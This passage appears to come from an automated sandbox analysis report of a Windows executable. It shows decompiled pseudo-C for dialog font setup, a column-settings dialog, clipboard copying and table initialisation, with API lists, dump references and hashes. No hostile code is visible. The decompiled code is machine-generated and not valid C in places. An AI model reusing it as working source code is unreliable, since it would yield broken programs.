                                                                                                                                                      				 *(__esi + 0x43c) = _t21;
                                                                                                                                                      				_t22 = SendDlgItemMessageW( *(__esi + 0x10), 0x3ec, 0x30, _t21, 0);
                                                                                                                                                      				_t33 =  *0x412fd0; // 0x0
                                                                                                                                                      				if(_t33 != 0) {
                                                                                                                                                      					return SendDlgItemMessageW( *(__esi + 0x10), 0x3ee, 0x30,  *(__esi + 0x43c), 0);
                                                                                                                                                      				}
                                                                                                                                                      				return _t22;
                                                                                                                                                      			}












                                                                                                                                                      APIs
                                                                                                                                                      • GetDC.USER32(00000000), ref: 00401049
                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401054
                                                                                                                                                      • ReleaseDC.USER32 ref: 00401068
                                                                                                                                                        • Part of subcall function 00405833: memset.MSVCRT ref: 0040583D
                                                                                                                                                        • Part of subcall function 00405833: wcscpy.MSVCRT ref: 0040587D
                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401087
                                                                                                                                                      • SendDlgItemMessageW.USER32 ref: 004010A5
                                                                                                                                                      • SendDlgItemMessageW.USER32 ref: 004010C1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemMessageSend$CapsCreateDeviceFontIndirectReleasememsetwcscpy
                                                                                                                                                      • String ID: MS Sans Serif
                                                                                                                                                      • API String ID: 1274520933-168460110
                                                                                                                                                      • Opcode ID: ed0759a4ae7ee862ca49db622f2c3c3492c51a7824ce9ae620841ebe78710657
                                                                                                                                                      • Instruction ID: 76445cfa4d73c44bf9acfae61aa42174960e6aa773b684d89c5daaca756457af
                                                                                                                                                      • Opcode Fuzzy Hash: ed0759a4ae7ee862ca49db622f2c3c3492c51a7824ce9ae620841ebe78710657
                                                                                                                                                      • Instruction Fuzzy Hash: 58019E71600308BBE7216BB0DD89F2B76BDF780700F000439F601F60D0D6B0AA188B68
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00403333(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t75;
                                                                                                                                                      				signed int _t77;
                                                                                                                                                      				signed int _t91;
                                                                                                                                                      				signed int _t92;
                                                                                                                                                      				void* _t100;
                                                                                                                                                      				void* _t104;
                                                                                                                                                      				short* _t122;
                                                                                                                                                      				unsigned int _t128;
                                                                                                                                                      				intOrPtr _t131;
                                                                                                                                                      				signed int _t134;
                                                                                                                                                      				void* _t149;
                                                                                                                                                      				void* _t150;
                                                                                                                                                      				intOrPtr* _t151;
                                                                                                                                                      				short _t157;
                                                                                                                                                      				signed int _t158;
                                                                                                                                                      
                                                                                                                                                      				_t132 = __ecx;
                                                                                                                                                      				_t75 = _a4 - 0x4e;
                                                                                                                                                      				_t158 = __ecx;
                                                                                                                                                      				if(_t75 == 0) {
                                                                                                                                                      					_t151 = _a12;
                                                                                                                                                      					__eflags =  *((intOrPtr*)(_t151 + 8)) - 0xfffffffd;
                                                                                                                                                      					if( *((intOrPtr*)(_t151 + 8)) == 0xfffffffd) {
                                                                                                                                                      						__eflags =  *((intOrPtr*)(_t151 + 4)) - 0x3e9;
                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                      							E00402D48(__eflags,  *_t151,  *(_t151 + 0xc));
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					__eflags =  *((intOrPtr*)(_t151 + 8)) - 0xffffff9b;
                                                                                                                                                      					if( *((intOrPtr*)(_t151 + 8)) != 0xffffff9b) {
                                                                                                                                                      						L27:
                                                                                                                                                      						__eflags = 0;
                                                                                                                                                      						return 0;
                                                                                                                                                      					} else {
                                                                                                                                                      						__eflags =  *((intOrPtr*)(_t151 + 4)) - 0x3e9;
                                                                                                                                                      						if( *((intOrPtr*)(_t151 + 4)) != 0x3e9) {
                                                                                                                                                      							goto L27;
                                                                                                                                                      						}
                                                                                                                                                      						_t77 =  *(_t151 + 0x14);
                                                                                                                                                      						__eflags = _t77 & 0x00000002;
                                                                                                                                                      						if((_t77 & 0x00000002) == 0) {
                                                                                                                                                      							L36:
                                                                                                                                                      							_t134 =  *(_t151 + 0x18) ^ _t77;
                                                                                                                                                      							__eflags = 0x0000f000 & _t134;
                                                                                                                                                      							if((0x0000f000 & _t134) == 0) {
                                                                                                                                                      								L39:
                                                                                                                                                      								__eflags =  *(_t151 + 0x14) & 0x00000002;
                                                                                                                                                      								if(( *(_t151 + 0x14) & 0x00000002) == 0) {
                                                                                                                                                      									goto L27;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags =  *(_t151 + 0x18) & 0x00000002;
                                                                                                                                                      								if(( *(_t151 + 0x18) & 0x00000002) != 0) {
                                                                                                                                                      									goto L27;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags =  *(_t151 + 0xc);
                                                                                                                                                      								E004013E1(_t158, 0x3eb, 0 |  *(_t151 + 0xc) != 0x00000000);
                                                                                                                                                      								__eflags =  *(_t151 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4)) - 1;
                                                                                                                                                      								E004013E1(_t158, 0x3ec, 0 |  *(_t151 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4)) - 0x00000001);
                                                                                                                                                      								 *((intOrPtr*)(_t158 + 0x48)) = 1;
                                                                                                                                                      								SetDlgItemInt( *(_t158 + 0x10), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)))) +  *(_t151 + 0x28) * 4), 0);
                                                                                                                                                      								 *((intOrPtr*)(_t158 + 0x48)) = 0;
                                                                                                                                                      								return 1;
                                                                                                                                                      							}
                                                                                                                                                      							L37:
                                                                                                                                                      							_t91 = E004027F9( *_t151,  *(_t151 + 0xc), 0xf002);
                                                                                                                                                      							__eflags = _t91 & 0x00000002;
                                                                                                                                                      							if((_t91 & 0x00000002) != 0) {
                                                                                                                                                      								_t92 = _t91 & 0x0000f000;
                                                                                                                                                      								__eflags = _t92 - 0x1000;
                                                                                                                                                      								_a8 = _t92;
                                                                                                                                                      								E004013E1(_t158, 0x3ee, 0 | _t92 == 0x00001000);
                                                                                                                                                      								_a8 - 0x2000 = _a8 == 0x2000;
                                                                                                                                                      								E004013E1(_t158, 0x3ef, 0 | _a8 == 0x00002000);
                                                                                                                                                      							}
                                                                                                                                                      							goto L39;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags =  *(_t151 + 0x18) & 0x00000002;
                                                                                                                                                      						if(( *(_t151 + 0x18) & 0x00000002) == 0) {
                                                                                                                                                      							goto L37;
                                                                                                                                                      						}
                                                                                                                                                      						goto L36;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t100 = _t75 - 0xc2;
                                                                                                                                                      				if(_t100 == 0) {
                                                                                                                                                      					SendDlgItemMessageW( *(__ecx + 0x10), 0x3ed, 0xc5, 3, 0);
                                                                                                                                                      					E004031BE(_t158);
                                                                                                                                                      					E00405B17(_t149,  *(_t158 + 0x10), 0);
                                                                                                                                                      					goto L27;
                                                                                                                                                      				}
                                                                                                                                                      				_t104 = _t100 - 1;
                                                                                                                                                      				if(_t104 != 0) {
                                                                                                                                                      					goto L27;
                                                                                                                                                      				}
                                                                                                                                                      				_t128 = _a8 >> 0x10;
                                                                                                                                                      				if( *((intOrPtr*)(__ecx + 0x48)) != _t104 || _t128 != 0x300) {
                                                                                                                                                      					L7:
                                                                                                                                                      					if(_t128 != 0) {
                                                                                                                                                      						goto L27;
                                                                                                                                                      					}
                                                                                                                                                      					if(_a8 != 0x3f0) {
                                                                                                                                                      						L13:
                                                                                                                                                      						if(_a8 == 0x3eb) {
                                                                                                                                                      							E00402AD0(GetDlgItem( *(_t158 + 0x10), 0x3e9), _t132);
                                                                                                                                                      						}
                                                                                                                                                      						if(_a8 == 0x3ec) {
                                                                                                                                                      							E00402B13(GetDlgItem( *(_t158 + 0x10), 0x3e9), _t132);
                                                                                                                                                      						}
                                                                                                                                                      						if(_a8 == 0x3ee) {
                                                                                                                                                      							E00402B4D(GetDlgItem( *(_t158 + 0x10), 0x3e9), 1);
                                                                                                                                                      						}
                                                                                                                                                      						if(_a8 == 0x3ef) {
                                                                                                                                                      							E00402B4D(GetDlgItem( *(_t158 + 0x10), 0x3e9), 0);
                                                                                                                                                      						}
                                                                                                                                                      						if(_a8 == 2) {
                                                                                                                                                      							EndDialog( *(_t158 + 0x10), 2);
                                                                                                                                                      						}
                                                                                                                                                      						if(_a8 == 1) {
                                                                                                                                                      							E0040314A(_t158);
                                                                                                                                                      							EndDialog( *(_t158 + 0x10), 1);
                                                                                                                                                      						}
                                                                                                                                                      						return 1;
                                                                                                                                                      					}
                                                                                                                                                      					_t131 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4));
                                                                                                                                                      					_t132 = 0;
                                                                                                                                                      					if(_t131 <= 0) {
                                                                                                                                                      						L12:
                                                                                                                                                      						E004031BE(_t158);
                                                                                                                                                      						goto L13;
                                                                                                                                                      					}
                                                                                                                                                      					_t150 = 0;
                                                                                                                                                      					do {
                                                                                                                                                      						_t122 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)))) + _t132 * 4;
                                                                                                                                                      						 *(_t122 + 2) = _t132;
                                                                                                                                                      						_t157 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x44)) + _t150 + 0xc));
                                                                                                                                                      						_t132 = _t132 + 1;
                                                                                                                                                      						_t150 = _t150 + 0x14;
                                                                                                                                                      						 *_t122 = _t157;
                                                                                                                                                      					} while (_t132 < _t131);
                                                                                                                                                      					goto L12;
                                                                                                                                                      				} else {
                                                                                                                                                      					if(_a8 != 0x3ed) {
                                                                                                                                                      						goto L27;
                                                                                                                                                      					} else {
                                                                                                                                                      						E004030F2(__ecx, __ecx);
                                                                                                                                                      						goto L7;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      			}





















                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32 ref: 004033D7
                                                                                                                                                      • GetDlgItem.USER32 ref: 004033EA
                                                                                                                                                      • GetDlgItem.USER32 ref: 004033FF
                                                                                                                                                      • GetDlgItem.USER32 ref: 00403417
                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 00403433
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00403448
                                                                                                                                                        • Part of subcall function 004030F2: GetDlgItem.USER32 ref: 00403100
                                                                                                                                                        • Part of subcall function 004030F2: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00403114
                                                                                                                                                      • SendDlgItemMessageW.USER32 ref: 00403460
                                                                                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00403574
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Item$Dialog$MessageSend
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3975816621-0
                                                                                                                                                      • Opcode ID: b22570e3695d17f10ab55852422601c1b292fc17fc6dd051dca6e12d0d289d37
                                                                                                                                                      • Instruction ID: 6d0dc51428ca510c7a6a0451b1b353988afeb0acb98747cdfda1134de420bc82
                                                                                                                                                      • Opcode Fuzzy Hash: b22570e3695d17f10ab55852422601c1b292fc17fc6dd051dca6e12d0d289d37
                                                                                                                                                      • Instruction Fuzzy Hash: 3661A330200705ABDB329F25CC86E1ABBA9FF04315F00853EF911AB6E1D779AE50CB59
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E00403584(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
                                                                                                                                                      				RECT* _v8;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t39;
                                                                                                                                                      				signed int _t41;
                                                                                                                                                      				void* _t42;
                                                                                                                                                      				struct HWND__* _t47;
                                                                                                                                                      				signed int _t53;
                                                                                                                                                      				void* _t54;
                                                                                                                                                      				signed int _t74;
                                                                                                                                                      				signed int _t76;
                                                                                                                                                      				void* _t78;
                                                                                                                                                      				void** _t80;
                                                                                                                                                      				signed int _t84;
                                                                                                                                                      				void* _t88;
                                                                                                                                                      				signed int _t89;
                                                                                                                                                      
                                                                                                                                                      				_t78 = __edi;
                                                                                                                                                      				_push(0xc);
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				 *((intOrPtr*)(__edi + 0x44)) = __eax;
                                                                                                                                                      				L0040E038();
                                                                                                                                                      				if(__eax == 0) {
                                                                                                                                                      					_t80 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					 *((intOrPtr*)(__eax)) = 0;
                                                                                                                                                      					_t80 = __eax;
                                                                                                                                                      				}
                                                                                                                                                      				 *(_t78 + 0x40) = _t80;
                                                                                                                                                      				_t39 =  *_t80;
                                                                                                                                                      				_t88 = _t39;
                                                                                                                                                      				if(_t88 != 0) {
                                                                                                                                                      					_push(_t39);
                                                                                                                                                      					L0040E032();
                                                                                                                                                      					 *_t80 = 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t80[2] = _a8;
                                                                                                                                                      				_t41 = E0040299A(_a8);
                                                                                                                                                      				_t74 = 4;
                                                                                                                                                      				_t80[1] = _t41;
                                                                                                                                                      				_t42 = _t41 * _t74;
                                                                                                                                                      				_push( ~(0 | _t88 > 0x00000000) | _t42);
                                                                                                                                                      				L0040E038();
                                                                                                                                                      				 *_t80 = _t42;
                                                                                                                                                      				memset(_t42, 0, _t80[1] << 2);
                                                                                                                                                      				E0040751C( *(_t78 + 0x40), ( *(_t78 + 0x40))[2]);
                                                                                                                                                      				_t89 =  *(_t78 + 0x44);
                                                                                                                                                      				if(_t89 == 0) {
                                                                                                                                                      					_t84 = ( *(_t78 + 0x40))[1];
                                                                                                                                                      					_t76 = 0x14;
                                                                                                                                                      					_t53 = _t84 * _t76;
                                                                                                                                                      					_push( ~(0 | _t89 > 0x00000000) | _t53);
                                                                                                                                                      					L0040E038();
                                                                                                                                                      					 *(_t78 + 0x44) = _t53;
                                                                                                                                                      					if(_t84 > 0) {
                                                                                                                                                      						_t54 = 0;
                                                                                                                                                      						do {
                                                                                                                                                      							 *((intOrPtr*)(_t54 +  *(_t78 + 0x44) + 0xc)) = 0x78;
                                                                                                                                                      							_t54 = _t54 + 0x14;
                                                                                                                                                      							_t84 = _t84 - 1;
                                                                                                                                                      						} while (_t84 != 0);
                                                                                                                                                      					}
                                                                                                                                                      					_v8 = 1;
                                                                                                                                                      				}
                                                                                                                                                      				if(E0040152F(0x448, _t78, _a4) == 1) {
                                                                                                                                                      					E00407487( *(_t78 + 0x40), ( *(_t78 + 0x40))[2]);
                                                                                                                                                      					InvalidateRect(( *(_t78 + 0x40))[2], 0, 0);
                                                                                                                                                      				}
                                                                                                                                                      				_t47 = SetFocus(_a8);
                                                                                                                                                      				if(_v8 != 0) {
                                                                                                                                                      					_push( *(_t78 + 0x44));
                                                                                                                                                      					L0040E032();
                                                                                                                                                      					return _t47;
                                                                                                                                                      				}
                                                                                                                                                      				return _t47;
                                                                                                                                                      			}



















                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2313361498-0
                                                                                                                                                      • Opcode ID: 24aef8737a6560aee288ce69192634901bd296d66f2a46c2a177e1884aa19c86
                                                                                                                                                      • Instruction ID: 3294c0e99436dff93e0626edbac004f6b09504e7bc31cfe1dcbb88acf09cb1a4
                                                                                                                                                      • Opcode Fuzzy Hash: 24aef8737a6560aee288ce69192634901bd296d66f2a46c2a177e1884aa19c86
                                                                                                                                                      • Instruction Fuzzy Hash: 3A3190B2501611BFDB249F69C94592ABBA8FF04354B04893EF605E76E0C77AEC108B54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E004054F1(void* _a4) {
                                                                                                                                                      				int _t7;
                                                                                                                                                      				signed int _t12;
                                                                                                                                                      				int _t14;
                                                                                                                                                      				void* _t18;
                                                                                                                                                      				signed int _t20;
                                                                                                                                                      				void* _t23;
                                                                                                                                                      
                                                                                                                                                      				_t23 = _a4;
                                                                                                                                                      				_t20 = 0;
                                                                                                                                                      				EmptyClipboard();
                                                                                                                                                      				if(_t23 != 0) {
                                                                                                                                                      					_t7 = wcslen(_t23);
                                                                                                                                                      					_t3 = _t7 + 2; // 0x2
                                                                                                                                                      					_t14 = _t7 + _t3;
                                                                                                                                                      					_t18 = GlobalAlloc(0x2000, _t14);
                                                                                                                                                      					if(_t18 != 0) {
                                                                                                                                                      						memcpy(GlobalLock(_t18), _t23, _t14);
                                                                                                                                                      						GlobalUnlock(_t18);
                                                                                                                                                      						_t12 = SetClipboardData(0xd, _t18);
                                                                                                                                                      						asm("sbb esi, esi");
                                                                                                                                                      						_t20 =  ~( ~_t12);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				CloseClipboard();
                                                                                                                                                      				return _t20;
                                                                                                                                                      			}










                                                                                                                                                      APIs
                                                                                                                                                      • EmptyClipboard.USER32(?,?,0040AE96,00000000), ref: 004054F9
                                                                                                                                                      • wcslen.MSVCRT ref: 00405506
                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002,00000000,?,?,?,0040AE96,00000000), ref: 00405516
                                                                                                                                                      • GlobalLock.KERNEL32 ref: 00405523
                                                                                                                                                      • memcpy.MSVCRT ref: 0040552C
                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405535
                                                                                                                                                      • SetClipboardData.USER32 ref: 0040553E
                                                                                                                                                      • CloseClipboard.USER32 ref: 0040554E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1213725291-0
                                                                                                                                                      • Opcode ID: 3f23b09ed67182d54db4a1c9f3f8af9c1593430563a161df7ce732bfd0db5a6d
                                                                                                                                                      • Instruction ID: cbe089e464cab8641743a2df57c61d738c9647510a312ad91d4355c2b2932f4a
                                                                                                                                                      • Opcode Fuzzy Hash: 3f23b09ed67182d54db4a1c9f3f8af9c1593430563a161df7ce732bfd0db5a6d
                                                                                                                                                      • Instruction Fuzzy Hash: 94F0BB371003287BD23037B1ED4CD6B776CDB85B49B05013DF505F6652DA355C084AB9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                      			E004078E1(intOrPtr* __eax, void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				signed int _t75;
                                                                                                                                                      				signed int _t77;
                                                                                                                                                      				signed short _t86;
                                                                                                                                                      				signed int _t88;
                                                                                                                                                      				signed int _t89;
                                                                                                                                                      				intOrPtr _t90;
                                                                                                                                                      				signed short _t96;
                                                                                                                                                      				void* _t98;
                                                                                                                                                      				signed int _t126;
                                                                                                                                                      				signed int _t128;
                                                                                                                                                      				signed int _t130;
                                                                                                                                                      				intOrPtr* _t133;
                                                                                                                                                      				signed int _t137;
                                                                                                                                                      				signed int _t139;
                                                                                                                                                      				void* _t142;
                                                                                                                                                      				void* _t143;
                                                                                                                                                      				void* _t147;
                                                                                                                                                      
                                                                                                                                                      				_t143 = __eflags;
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_t133 = __eax;
                                                                                                                                                      				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x6c))();
                                                                                                                                                      				E0040768E(__eax);
                                                                                                                                                      				 *(_t133 + 0x40) =  *(_t133 + 0x40) & 0x00000000;
                                                                                                                                                      				_t137 = 0xb;
                                                                                                                                                      				 *((intOrPtr*)(_t133 + 0x2ac)) = _a4;
                                                                                                                                                      				_t126 = 0x14;
                                                                                                                                                      				_t75 = _t137 * _t126;
                                                                                                                                                      				 *(_t133 + 0x2e0) = _t137;
                                                                                                                                                      				_push( ~(0 | _t143 > 0x00000000) | _t75);
                                                                                                                                                      				L0040E038();
                                                                                                                                                      				 *(_t133 + 0x2e4) = _t75;
                                                                                                                                                      				_t128 = 0x14;
                                                                                                                                                      				_t77 = _t137 * _t128;
                                                                                                                                                      				_push( ~(0 | _t143 > 0x00000000) | _t77);
                                                                                                                                                      				L0040E038();
                                                                                                                                                      				_t98 = 0x4120c0;
                                                                                                                                                      				 *(_t133 + 0x48) = _t77;
                                                                                                                                                      				_v8 = 0x4120c0;
                                                                                                                                                      				do {
                                                                                                                                                      					_t139 =  *_t98 * 0x14;
                                                                                                                                                      					memcpy( *(_t133 + 0x2e4) + _t139, _t98, 0x14);
                                                                                                                                                      					_t24 = _t98 + 0x14; // 0x4120d4
                                                                                                                                                      					memcpy( *(_t133 + 0x48) + _t139, _t24, 0x14);
                                                                                                                                                      					_t86 =  *( *(_t133 + 0x2e4) + _t139 + 0x10);
                                                                                                                                                      					_t142 = _t142 + 0x18;
                                                                                                                                                      					_v12 = _t86;
                                                                                                                                                      					 *( *(_t133 + 0x48) + _t139 + 0x10) = _t86;
                                                                                                                                                      					if((_t86 & 0xffff0000) == 0) {
                                                                                                                                                      						 *( *(_t133 + 0x2e4) + _t139 + 0x10) = E00406827(_t86 & 0x0000ffff);
                                                                                                                                                      						_t96 = E00406827(_v12 | 0x00010000);
                                                                                                                                                      						_t98 = _v8;
                                                                                                                                                      						 *( *(_t133 + 0x48) + _t139 + 0x10) = _t96;
                                                                                                                                                      					}
                                                                                                                                                      					_t98 = _t98 + 0x28;
                                                                                                                                                      					_t147 = _t98 - 0x412278;
                                                                                                                                                      					_v8 = _t98;
                                                                                                                                                      				} while (_t147 < 0);
                                                                                                                                                      				 *(_t133 + 0x4c) =  *(_t133 + 0x4c) & 0x00000000;
                                                                                                                                                      				 *((intOrPtr*)(_t133 + 0x50)) = _a8;
                                                                                                                                                      				_t88 = 0xb;
                                                                                                                                                      				_t130 = 4;
                                                                                                                                                      				 *(_t133 + 0x34) = _t88;
                                                                                                                                                      				_t89 = _t88 * _t130;
                                                                                                                                                      				 *((intOrPtr*)(_t133 + 0x30)) = 0x20;
                                                                                                                                                      				_push( ~(0 | _t147 > 0x00000000) | _t89);
                                                                                                                                                      				L0040E038();
                                                                                                                                                      				_push(0xc);
                                                                                                                                                      				 *(_t133 + 0x38) = _t89;
                                                                                                                                                      				L0040E038();
                                                                                                                                                      				_t140 = _t89;
                                                                                                                                                      				if(_t89 == 0) {
                                                                                                                                                      					_t90 = 0;
                                                                                                                                                      					__eflags = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t90 = E00407440(_a4,  *((intOrPtr*)(_t133 + 0x60)), _t140);
                                                                                                                                                      				}
                                                                                                                                                      				 *((intOrPtr*)(_t133 + 0x2cc)) = _t90;
                                                                                                                                                      				 *((intOrPtr*)(_t133 + 0x54)) = 1;
                                                                                                                                                      				 *((intOrPtr*)(_t133 + 0x58)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t133 + 0x2c0)) = 1;
                                                                                                                                                      				 *((intOrPtr*)(_t133 + 0x2c4)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t133 + 0x2c8)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t133 + 0x2d0)) = 1;
                                                                                                                                                      				 *((intOrPtr*)(_t133 + 0x2d4)) = 1;
                                                                                                                                                      				 *((intOrPtr*)(_t133 + 0x344)) = 0x32;
                                                                                                                                                      				 *((intOrPtr*)(_t133 + 0x64)) = 0xffffff;
                                                                                                                                                      				return E00407861(_t133);
                                                                                                                                                      			}


























                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 0040769A
                                                                                                                                                        • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076A8
                                                                                                                                                        • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076B9
                                                                                                                                                        • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D0
                                                                                                                                                        • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D9
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00407923
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040793F
                                                                                                                                                      • memcpy.MSVCRT ref: 00407962
                                                                                                                                                      • memcpy.MSVCRT ref: 00407973
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 004079F4
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 004079FE
                                                                                                                                                        • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                        • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                        • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                        • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                        • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                        • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                      • String ID: x"A
                                                                                                                                                      • API String ID: 975042529-63625180
                                                                                                                                                      • Opcode ID: 5e15de00d9b0122d9a525f1b9c652474aa833521780f625cb65b569559e88023
                                                                                                                                                      • Instruction ID: 8801afb4ace5fbedb5bd820c2c75847393e8be4378505899df7aece04ba2f2e1
                                                                                                                                                      • Opcode Fuzzy Hash: 5e15de00d9b0122d9a525f1b9c652474aa833521780f625cb65b569559e88023
                                                                                                                                                      • Instruction Fuzzy Hash: 79418DB2A01712AFD718DF3AD485B99BBA4BF04314F10422FE609DB2C1D775B8208B98
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 49%
                                                                                                                                                      			E004031BE(intOrPtr _a4) {
                                                                                                                                                      				struct HWND__* _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				int _v16;
                                                                                                                                                      				int _v20;
                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                      				short _v28;
                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                      				char* _v60;
